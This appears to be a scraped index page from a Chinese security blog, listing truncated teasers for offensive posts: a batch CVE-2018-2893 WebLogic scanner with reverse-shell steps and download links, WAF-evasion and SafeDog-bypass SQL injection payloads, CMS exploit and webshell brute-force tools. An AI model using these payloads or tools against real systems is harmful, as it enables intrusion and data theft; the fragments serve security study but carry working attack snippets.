看我如何利用发现的漏洞接管D-Link路由器

640.webp.jpg

CVE-2018-2893批量工具

使用说明:环境 python 2.7批量扫描 7001端口 以 ip:7001放入url.txt运行python CVE-2018-2893-MultiThreading.py 批量检测成功结果在weblogic1_success.txtnc 监听 nc -lvvp 监听端口运行python weblogic.py 成功ip 7001 本机ip 监听端口可反弹shell链接: https://pan.baidu.com/s/11VIjLv_yNaBie9xRpyrI_w 提取码: d2qf

CMS漏洞检测和利用套件

CMSeeK是一个CMS的漏洞检测和利用套件。已发布版本- Version 1.0.1 [19-06-2018] - Version 1.0.0 [15-06-2018]Changelog文件特性支持20多种CMS的基本CMS检测高级Wordpress扫描版本检测用户检测(3种检测方法)查找版本漏洞等!模块化爆破系统 你可以根据需求选择自带爆破模块或自己创建模块并与之集成安装要求及兼容性:CMSeeK是由python

一些bypass语句

AF evasion methods for sql Injections  I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You&nbs

WAF绕过的一些总结和思考

(测试环境 windows 2003 Enterprise 中文语言包 + APAC++HE + WAF)WAF分类:1.网络层类2.最常见且容易部署的应用层类 (部署在APAC++HE之前,APAC++HE之后)应用层WAF – 利用WAF自身缺陷和MYSQL语法特性并结合实际绕过:WAF最常见检测方式:关键词检测 例如 如果出现 [空格]union[空格] 这样的SQL语句则视为恶意请求,丢弃这个数据包,XSS代码同理。常见的绕过类型:类型1:数据包 -> WAF(利用string存储

利用Zgrab绕CDN找真实IP

1. 安装Zmap1yum install zmap git wget如果提示找不到zmap请自行添加最新的源CentOS6:1yum install https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpmCentOS7:1yum install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm 2. 安装Go

攻破黑市之拿下吃鸡DNF等游戏钓鱼站群

攻破黑市之拿下吃鸡DNF等游戏钓鱼站群

过狗3连击 三种姿势SQL注入绕过安全狗

安全狗截图: 1、使用/*/**//*!/*!SELECT*/ 囊括关键字能够绕过安全狗的SQL注入拦截。Payload:http://192.168.119.136/sqli-labs-master/less-1/?id=-1'/*!UNION/*/**//*!/*!SELECT*/1,group_concat(username),3/*/**//*!/*!FROM*/users-- -绕过截图: 2、使用/*!union/*/*?%0o*/select*

thinkphp_log 日志扫描工具

thinkphp 如果开启了日志 记录 ,会把一些错误信息记录在log目录里这个工具能够帮助你 更加简单快捷地爬取错误日志。用法:thinkphp_log.py http://www.5kik.com/ 18 www.5kik.com.txt第一参数是 网站 请务必在最后加上/ 第二个参数 18是18年的  第三个参数 ybi.com是保存文件名。运行打开文件链接: https://pan.baidu.com/s/1pnH5B7L4sTFjMCyhBgzszA 密码: b7g

webshell爆破脚本

H]4W3H4X}3GC)EJ1KE9(Q.png